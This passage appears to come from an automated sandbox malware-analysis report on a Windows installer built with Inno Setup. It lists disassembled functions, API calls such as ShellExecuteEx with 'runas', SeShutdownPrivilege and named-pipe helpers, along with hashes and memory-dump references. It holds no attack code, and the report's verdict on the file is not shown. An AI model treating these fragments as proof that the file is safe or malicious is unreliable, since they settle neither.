                                                              APIs
                                                              • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory
                                                              • String ID:
                                                              • API String ID: 1611563598-0
                                                              • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                              • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                              • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                              • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                              Function 0042E3EF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                              • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                              • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                              • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                              Function 004165EC Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: DestroyWindow
                                                              • String ID:
                                                              • API String ID: 3375834691-0
                                                              • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                              • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                              • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                              • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                              Function 00448728 Relevance: 1.4, APIs: 1, Instructions: 158COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                              • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                              • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                              • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                              Function 0041F3C4 Relevance: 1.3, APIs: 1, Instructions: 52memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                              • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                              • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                              • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                              Function 00452FC4 Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetLastError.KERNEL32(00000000,0045302D), ref: 0045300F
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast
                                                              • String ID:
                                                              • API String ID: 1452528299-0
                                                              • Opcode ID: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                              • Instruction ID: b902f5f71593d0acd8113edc39c0d5725662cc955bae9521e0e34912f41e4d76
                                                              • Opcode Fuzzy Hash: 796ee09302341f2f0fe022b6b7ad64e2259239b3e6510a293da86372227c0e6a
                                                              • Instruction Fuzzy Hash: 850170356042486FC701DF699C008EEFBE8EB4D76171082B7FC24C3382D7345E059664
                                                              Function 0040170C Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • VirtualFree.KERNEL32(?,?,00004000,?,?,?,00001CA0,00005CA3,00401973), ref: 00401766
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: FreeVirtual
                                                              • String ID:
                                                              • API String ID: 1263568516-0
                                                              • Opcode ID: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                              • Instruction ID: fd45504e6079eb3c344fd15592bdf3984e08e9418c18d248e8b2091ea2ac4f2a
                                                              • Opcode Fuzzy Hash: 3cb279d385dc81f8188aef87182d0a586e7f532f71175ddb5b892d42a5daf7f8
                                                              • Instruction Fuzzy Hash: A10120766443148FC3109F29EDC0E2677E8D794378F15453EDA85673A1D37A6C0187D8
                                                              Function 00401340 Relevance: 1.3, APIs: 1, Instructions: 34memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LocalAlloc.KERNEL32(00000000,00000644,?,0049B450,004013A3,?,?,00401443,?,?,?,00001CA0,00005CA3,00401983), ref: 00401353
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AllocLocal
                                                              • String ID:
                                                              • API String ID: 3494564517-0
                                                              • Opcode ID: 833cffc3d4ae6fddf196a7017a3fa962a39b4640526386715143ff6d9bbaf8a6
                                                              • Instruction ID: 71c91fbc4c3ed8fd369fb1531a6952d3d9178ec9d6227f0a2e7a8dd8dab45303
                                                              • Opcode Fuzzy Hash: 833cffc3d4ae6fddf196a7017a3fa962a39b4640526386715143ff6d9bbaf8a6
                                                              • Instruction Fuzzy Hash: 0CF05E717013018FE724CF29D980656B7E1EBA9365F24807EE5C5D7761D3358C419B94
                                                              Function 00406F48 Relevance: 1.3, APIs: 1, Instructions: 3COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                              • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                              • Opcode Fuzzy Hash: 11f5b55454e2001d57305e4d26194660ee260494afc1ae4151642f59c6b90a28
                                                              • Instruction Fuzzy Hash:

                                                              Non-executed Functions

                                                              Function 0041F118 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetVersion.KERNEL32(?,00418FF0,00000000,?,?,?,00000001), ref: 0041F126
                                                              • SetErrorMode.KERNEL32(00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F142
                                                              • LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F14E
                                                              • SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F15C
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F18C
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F1B5
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1CA
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1DF
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1F4
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F209
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F21E
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F233
                                                              • GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F248
                                                              • GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F25D
                                                              • FreeLibrary.KERNEL32(00000001,?,00418FF0,00000000,?,?,?,00000001), ref: 0041F26F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
                                                              • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                                              • API String ID: 2323315520-3614243559
                                                              • Opcode ID: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                              • Instruction ID: e724c2aa341d6685c6ab1c4031cb88844a897dd828fe35f3324890dc483947ec
                                                              • Opcode Fuzzy Hash: 62814c6def9f01bce39a36d2c4270fbdb1234b3c2cb706e68bb71ccad2797809
                                                              • Instruction Fuzzy Hash: 8E314FB2640700ABEB01EBB9AC46A6B3794F328724741093FB508D7192D77C5C55CF5C
                                                              Function 004585C8 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 186pipeprocessfileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetTickCount.KERNEL32 ref: 0045862F
                                                              • QueryPerformanceCounter.KERNEL32(021E3858,00000000,004588C2,?,?,021E3858,00000000,?,00458FBE,?,021E3858,00000000), ref: 00458638
                                                              • GetSystemTimeAsFileTime.KERNEL32(021E3858,021E3858), ref: 00458642
                                                              • GetCurrentProcessId.KERNEL32(?,021E3858,00000000,004588C2,?,?,021E3858,00000000,?,00458FBE,?,021E3858,00000000), ref: 0045864B
                                                              • CreateNamedPipeA.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 004586C1
                                                              • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000,?,021E3858,021E3858), ref: 004586CF
                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458717
                                                              • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0045886D,?,00000000,C0000000,00000000,00499B24,00000003,00000000,00000000,00000000,0045887E), ref: 00458750
                                                                • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                              • CreateProcessA.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 004587F9
                                                              • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0045882F
                                                              • CloseHandle.KERNEL32(000000FF,00458874,?,00000000,00000000,00000001,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 00458867
                                                                • Part of subcall function 0045349C: GetLastError.KERNEL32(00000000,00454031,00000005,00000000,00454066,?,?,00000000,0049B628,00000004,00000000,00000000,00000000,?,004983A5,00000000), ref: 0045349F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                              • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                              • API String ID: 770386003-3271284199
                                                              • Opcode ID: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                              • Instruction ID: 54c9584e853abf465b9d0f30fdd509929e5717807e8393d963d4681616065440
                                                              • Opcode Fuzzy Hash: a79b95222fdd7f93703faf8b41e336e667bfcfce42d59c7d41cb43afe138310a
                                                              • Instruction Fuzzy Hash: 19710470A003449EDB11EB65CC45B9E77F4EB05705F1085BAF904FB282DB7899488F69
                                                              Function 00478504 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 94COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00478370: GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021E2BD0,?,?,?,021E2BD0,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                • Part of subcall function 00478370: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                • Part of subcall function 00478370: GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021E2BD0,?,?,?,021E2BD0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                • Part of subcall function 00478370: CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021E2BD0,?,?,?,021E2BD0), ref: 004783CC
                                                                • Part of subcall function 00478370: CloseHandle.KERNEL32(00000000,?,?,?,021E2BD0,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                • Part of subcall function 00478448: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,004784DA,?,?,?,021E2BD0,?,0047853C,00000000,00478652,?,?,-00000010,?), ref: 00478478
                                                              • ShellExecuteEx.SHELL32(0000003C), ref: 0047858C
                                                              • GetLastError.KERNEL32(00000000,00478652,?,?,-00000010,?), ref: 00478595
                                                              • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000000FF), ref: 004785E2
                                                              • GetExitCodeProcess.KERNEL32(00000000,00000000), ref: 00478606
                                                              • CloseHandle.KERNEL32(00000000,00478637,00000000,00000000,000000FF,000000FF,00000000,00478630,?,00000000,00478652,?,?,-00000010,?), ref: 0047862A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseFile$AddressAttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcProcessShellWait
                                                              • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                              • API String ID: 883996979-221126205
                                                              • Opcode ID: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                              • Instruction ID: b05a94d88e1d9ee0fbafe330a65326fe691daae9ca7e583bddfe233bc85c86e1
                                                              • Opcode Fuzzy Hash: e395260aa41f9ccfe4acc1b6a7661f4649f54ca3d6eb9a5996b4c5021f667ff4
                                                              • Instruction Fuzzy Hash: 0E314470A40208BEDB11EFE6C859ADEB7B8EB45718F50843FF508E7281DA7C99058B5D
                                                              Function 0042285C Relevance: 18.3, APIs: 12, Instructions: 255windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageA.USER32(00000000,00000223,00000000,00000000), ref: 004229F4
                                                              • ShowWindow.USER32(00000000,00000003,00000000,00000223,00000000,00000000,00000000,00422BBE), ref: 00422A04
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: MessageSendShowWindow
                                                              • String ID:
                                                              • API String ID: 1631623395-0
                                                              • Opcode ID: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                              • Instruction ID: 9e9026b6a08d43f4c34b0c014f83afec13b9727198b5f0eb67f7172f0d04fbcb
                                                              • Opcode Fuzzy Hash: 7d35c436bdc301b114185cd71e9b34d3d25d314c488a7ae3a8b4f853deae8013
                                                              • Instruction Fuzzy Hash: 90915171B04214BFDB11EFA9DA86F9D77F4AB04304F5500BAF504AB392CB78AE419B58
                                                              Function 00418384 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • IsIconic.USER32(?), ref: 00418393
                                                              • GetWindowPlacement.USER32(?,0000002C), ref: 004183B0
                                                              • GetWindowRect.USER32(?), ref: 004183CC
                                                              • GetWindowLongA.USER32(?,000000F0), ref: 004183DA
                                                              • GetWindowLongA.USER32(?,000000F8), ref: 004183EF
                                                              • ScreenToClient.USER32(00000000), ref: 004183F8
                                                              • ScreenToClient.USER32(00000000,?), ref: 00418403
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333977380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334015643.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3334061572.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                              • String ID: ,
                                                              • API String ID: 2266315723-3772416878
                                                              • Opcode ID: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                              • Instruction ID: 8875a2d430ef8be2c5346fa25315cde737655516302bc4d2344e38a88124d083
                                                              • Opcode Fuzzy Hash: 093fbc58c9f2bb22a74bd7cb36b3f86111f4d6c014dbe9a16a5ffda61369e0f0
                                                              • Instruction Fuzzy Hash: 2B112B71505201ABEB00DF69C885F9B77E8AF48314F04067EFD58DB296D738D900CB65
                                                              Function 004555E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 41shutdownCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32(00000028), ref: 004555F3
                                                              • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 004555F9
                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 00455612
                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 00455639
                                                              • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 0045563E
                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 0045564F
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.3333817277.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.3333779908.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.3333936344.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
